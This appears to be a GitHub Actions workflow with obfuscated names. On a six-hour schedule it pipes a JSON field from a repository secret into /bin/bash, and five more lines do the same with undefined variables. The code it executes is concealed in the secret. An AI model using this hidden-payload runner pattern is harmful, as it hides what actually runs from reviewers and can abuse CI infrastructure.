name: gaoqianyu5647

on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaoqianyu5647
        env:
          myew71: ${{ secrets.myew71 }}
        run: |
          echo $myew71 | jq -r .s708 | /bin/bash
          echo $n3 | jq -r .b65535 | /bin/bash
          echo $n73 | jq -r .p39049 | /bin/bash
          echo $q09545 | jq -r .wfy4268 | /bin/bash
          echo $s95609 | jq -r .sxhw88 | /bin/bash
          echo $otgy194 | jq -r .bv7010 | /bin/bash

